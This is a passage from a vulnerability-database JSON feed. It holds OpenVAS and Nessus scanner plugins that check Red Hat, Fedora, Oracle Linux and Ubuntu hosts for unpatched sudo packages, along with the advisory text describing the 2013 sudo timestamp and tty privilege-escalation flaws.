sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. 
(CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n * Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n * Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n * Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n * Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using\n'visudo -s'. 
(BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1353-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00055.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-19T15:08:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "Check for the Version of sudo", "modified": "2018-01-19T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:871048", "href": "http://plugins.openvas.org/nasl.php?oid=871048", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1353-01", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1353-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871048);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:17:42 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1353-01\");\n\n tag_insight = \"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. 
An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. 
(BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n- -s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n\";\n\n tag_affected = \"sudo on Red Hat Enterprise Linux (v. 5 server)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1353-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00055.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2018-01-18T11:08:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2012-2337"], "description": "Check for the Version of sudo", "modified": "2018-01-17T00:00:00", "published": "2013-03-22T00:00:00", "id": "OPENVAS:865484", "href": "http://plugins.openvas.org/nasl.php?oid=865484", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3270", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3270\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Fedora 17\";\ntag_insight = \"Sudo (superuser do) allows a system administrator to give certain\n users (or groups of users) the ability to run some (or all) commands\n as root while logging all commands and arguments. Sudo operates on a\n per-command basis. It is not a replacement for the shell. 
Features\n include: the ability to restrict what commands a user may run on a\n per-host basis, copious logging of each command (providing a clear\n audit trail of who did what), a configurable timeout of the sudo\n command, and the ability to use the same configuration file (sudoers)\n on many different machines.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100498.html\");\n script_id(865484);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-22 10:37:00 +0530 (Fri, 22 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2012-2337\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3270\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3270\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p7~1.fc17\", 
rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "Oracle Linux Local Security Checks ELSA-2013-1353", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123560", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1353", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1353.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123560\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:32 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1353\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1353 - sudo security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1353\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1353.html\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"sudo\", 
rpm:\"sudo~1.7.2p1~28.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "The remote host is missing an update for the 'sudo' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:1361412562310871085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871085", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1701-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1701-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871085\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:44:31 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1701-02\");\n\n\n script_tag(name:\"affected\", value:\"sudo on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. 
(CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n * Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n * When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to 'unlimited'.\n(BZ#947276)\n\n * Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n'root' was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n * Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n * With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. 
These messages should provide better\nunderstanding of how sudo matches netgroup d ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1701-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00034.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:08:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "Check for the Version of sudo", "modified": "2018-01-17T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:871085", "href": "http://plugins.openvas.org/nasl.php?oid=871085", "type": "openvas", "title": "RedHat Update for sudo 
RHSA-2013:1701-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1701-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871085);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:44:31 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1701-02\");\n\n tag_insight = \"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. 
An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to 'unlimited'.\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n'root' was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. 
(BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup d ...\n\n Description truncated, for more information please check the Reference URL\";\n\n tag_affected = \"sudo on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1701-02\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00034.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", 
rpm:\"sudo-debuginfo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T06:39:17", "description": "Marco Schoepl discovered that Sudo incorrectly handled time stamp\nfiles when the system clock is set to epoch. A local attacker could\nuse this issue to run Sudo commands without a password prompt.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2013-03-01T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : sudo vulnerability (USN-1754-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:sudo-ldap", "p-cpe:/a:canonical:ubuntu_linux:sudo", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1754-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64969", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1754-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64969);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1775\");\n script_bugtraq_id(58203);\n script_xref(name:\"USN\", value:\"1754-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : sudo vulnerability (USN-1754-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Schoepl discovered that Sudo incorrectly handled time stamp\nfiles when the system clock is set to epoch. A local attacker could\nuse this issue to run Sudo commands without a password prompt.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
